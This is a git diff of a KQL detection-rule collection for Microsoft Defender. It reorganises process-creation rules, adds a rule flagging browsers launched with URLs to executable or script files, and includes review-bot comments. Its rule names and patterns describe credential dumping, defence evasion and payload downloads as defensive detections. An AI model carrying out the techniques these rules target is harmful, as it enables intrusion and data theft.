diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql similarity index 100% rename from KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql rename to KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql diff --git a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql similarity index 100% rename from KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql rename to KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql diff --git a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql rename to KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql diff --git a/KQL/rules/Discovery/detected_windows_software_discovery.kql b/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql similarity index 100% rename from KQL/rules/Discovery/detected_windows_software_discovery.kql rename to KQL/rules/windows/process_creation/detected_windows_software_discovery.kql diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql similarity index 100% rename from KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql rename to KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql 
diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql rename to KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql diff --git a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql similarity index 100% rename from KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql rename to KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql diff --git a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql b/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql rename to KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql similarity index 100% rename from KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql rename to KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql diff --git a/KQL/rules/Discovery/dirlister_execution.kql b/KQL/rules/windows/process_creation/dirlister_execution.kql similarity index 92% rename from KQL/rules/Discovery/dirlister_execution.kql rename to KQL/rules/windows/process_creation/dirlister_execution.kql index 4129cbf9..acce8563 100644 --- a/KQL/rules/Discovery/dirlister_execution.kql +++ b/KQL/rules/windows/process_creation/dirlister_execution.kql 
@@ -9,4 +9,4 @@
 // - Legitimate use by users
 
 DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe"
\ No newline at end of file
+| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\DirLister.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/disable_important_scheduled_task.kql b/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql
similarity index 100%
rename from KQL/rules/Impact/disable_important_scheduled_task.kql
rename to KQL/rules/windows/process_creation/disable_important_scheduled_task.kql
diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql
rename to KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql
diff --git a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql b/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql
rename to KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql
diff --git a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql b/KQL/rules/windows/process_creation/disabled_ie_security_features.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disabled_ie_security_features.kql
rename to KQL/rules/windows/process_creation/disabled_ie_security_features.kql
diff --git a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql b/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disabled_volume_snapshots.kql
rename to KQL/rules/windows/process_creation/disabled_volume_snapshots.kql
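Review bot: The change from `"\\dirlister.exe"` to `"\\DirLister.exe"` on the `| where` line has no effect on matching, because KQL `endswith` (like the `=~` operator earlier on the same line) is case-insensitive; the lowercase form also followed the casing used elsewhere in this set, e.g. `FolderPath endswith "\\chrome.exe"` in the new browser rule on this page. If the intent is purely cosmetic alignment with the `ProcessVersionInfoOriginalFileName` value, a one-line comment such as `// endswith is case-insensitive; casing mirrors the OriginalFileName value` keeps a later reader from assuming a semantic fix. Case-insensitive matching is the desirable behaviour for a filename check like this, so `endswith_cs` should not be introduced. The rest of the rule header lies outside the hunk.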
diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
rename to KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
diff --git a/KQL/rules/Discovery/discovery_of_a_system_time.kql b/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql
similarity index 100%
rename from KQL/rules/Discovery/discovery_of_a_system_time.kql
rename to KQL/rules/windows/process_creation/discovery_of_a_system_time.kql
diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql
rename to KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql
diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql
rename to KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql
diff --git a/KQL/rules/Defense Evasion/dism_remove_online_package.kql b/KQL/rules/windows/process_creation/dism_remove_online_package.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dism_remove_online_package.kql
rename to KQL/rules/windows/process_creation/dism_remove_online_package.kql
diff --git a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql
rename to KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql
diff --git a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql
rename to KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql
diff --git a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql
rename to KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql
diff --git a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql
rename to KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql
diff --git a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql
rename to KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql
diff --git a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql
rename to KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql
diff --git a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql
similarity index 100%
rename from KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql
rename to KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql
diff --git a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql b/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql
similarity index 100%
rename from KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql
rename to KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql
diff --git a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql
rename to KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql
diff --git a/KQL/rules/Discovery/driverquery_exe_execution.kql b/KQL/rules/windows/process_creation/driverquery_exe_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/driverquery_exe_execution.kql
rename to KQL/rules/windows/process_creation/driverquery_exe_execution.kql
diff --git a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql b/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql
similarity index 100%
rename from KQL/rules/Persistence/dropping_of_password_filter_dll.kql
rename to KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql
diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql
similarity index 100%
rename from KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql
rename to KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql
diff --git a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql
rename to KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql
diff --git a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql b/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql
rename to KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql
diff --git a/KQL/rules/Defense Evasion/dumpminitool_execution.kql b/KQL/rules/windows/process_creation/dumpminitool_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dumpminitool_execution.kql
rename to KQL/rules/windows/process_creation/dumpminitool_execution.kql
diff --git a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql b/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql
rename to KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql
diff --git a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql
rename to KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql
diff --git a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql b/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql
similarity index 100%
rename from KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql
rename to KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql
similarity index 100%
rename from KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
rename to KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql
diff --git a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql
rename to KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql
diff --git a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql
similarity index 100%
rename from KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql
rename to KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql
diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql
similarity index 100%
rename from KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
rename to KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql
diff --git a/KQL/rules/Credential Access/esentutl_gather_credentials.kql b/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql
similarity index 100%
rename from KQL/rules/Credential Access/esentutl_gather_credentials.kql
rename to KQL/rules/windows/process_creation/esentutl_gather_credentials.kql
diff --git a/KQL/rules/Collection/esentutl_steals_browser_information.kql b/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql
similarity index 100%
rename from KQL/rules/Collection/esentutl_steals_browser_information.kql
rename to KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql
diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
rename to KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql
diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
rename to KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql
diff --git a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql b/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql
similarity index 100%
rename from KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql
rename to KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql
diff --git a/KQL/rules/Execution/execute_code_with_pester_bat.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql
similarity index 100%
rename from KQL/rules/Execution/execute_code_with_pester_bat.kql
rename to KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql
diff --git a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql
similarity index 100%
rename from KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql
rename to KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql
diff --git a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql b/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql
rename to KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql
diff --git a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql b/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql
rename to KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql
diff --git a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql
rename to KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql
diff --git a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql b/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execution_of_non_existing_file.kql
rename to KQL/rules/windows/process_creation/execution_of_non_existing_file.kql
diff --git a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql
similarity index 100%
rename from KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql
rename to KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql
diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
rename to KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql
diff --git a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql b/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql
rename to KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql
diff --git a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql b/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql
rename to KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql
diff --git a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql b/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql
rename to KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql
diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/windows/process_creation/explorer_process_tree_break.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/explorer_process_tree_break.kql
rename to KQL/rules/windows/process_creation/explorer_process_tree_break.kql
diff --git a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql
similarity index 100%
rename from KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql
rename to KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql
diff --git a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql b/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql
similarity index 100%
rename from KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql
rename to KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql
diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql
similarity index 100%
rename from KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
rename to KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql
diff --git a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql
diff --git a/KQL/rules/Execution/file_decryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql
similarity index 100%
rename from KQL/rules/Execution/file_decryption_using_gpg4win.kql
rename to KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql
diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/windows/process_creation/file_deletion_via_del.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_deletion_via_del.kql
rename to KQL/rules/windows/process_creation/file_deletion_via_del.kql
diff --git a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql
similarity index 100%
rename from KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql
rename to KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql
diff --git a/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql
new file mode 100644
index 00000000..2ec8624d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql
@@ -0,0 +1,10 @@
+// Title: File Download From Browser Process Via Inline URL
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") or (ProcessCommandLine contains ".7z\"" or ProcessCommandLine contains ".dat\"" or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".hta\"" or ProcessCommandLine contains ".ps1\"" or ProcessCommandLine contains ".psm1\"" or ProcessCommandLine contains ".txt\"" or ProcessCommandLine contains ".vbe\"" or ProcessCommandLine contains ".vbs\"" or ProcessCommandLine contains ".zip\"")) and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
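Review bot: The quoted-argument group in the `| where` line omits `.exe` even though the suffix group includes it, so a command line where the URL ending in `.exe` is wrapped in double quotes and followed by further arguments is not matched; adding `ProcessCommandLine contains ".exe\""` to the second group makes the two lists symmetric (this asymmetry may mirror the upstream Sigma rule, so it is worth checking before diverging). The header has no false-positives field, and the `.txt`/`.dat` suffixes will also match legitimate browser launches of plain-text resources, so a `// False Positives: ...` line describing expected benign hits would help triage. The file is also written without a trailing newline (`\ No newline at end of file`), which is worth fixing for consistency with the other rule files.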
diff --git a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql
similarity index 100%
rename from KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql
rename to KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql
diff --git a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql
similarity index 100%
rename from KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql
rename to KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql
diff --git a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql b/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql
similarity index 100%
rename from KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql
rename to KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql
diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql
rename to KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql
rename to KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
rename to KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
rename to KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
diff --git a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql
similarity index 100%
rename from KQL/rules/Command and Control/file_download_via_certoc_exe.kql
rename to KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql
diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
rename to KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql
diff --git a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql
rename to KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql
diff --git a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql b/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_with_headless_browser.kql
rename to KQL/rules/windows/process_creation/file_download_with_headless_browser.kql
diff --git a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql
diff --git a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
similarity index 100%
rename from KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
rename to KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
diff --git a/KQL/rules/Execution/file_encryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql
similarity index 100%
rename from KQL/rules/Execution/file_encryption_using_gpg4win.kql
rename to KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql
diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
similarity index 100%
rename from KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
rename to KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
diff --git a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql
similarity index 100%
rename from KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
rename to KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql
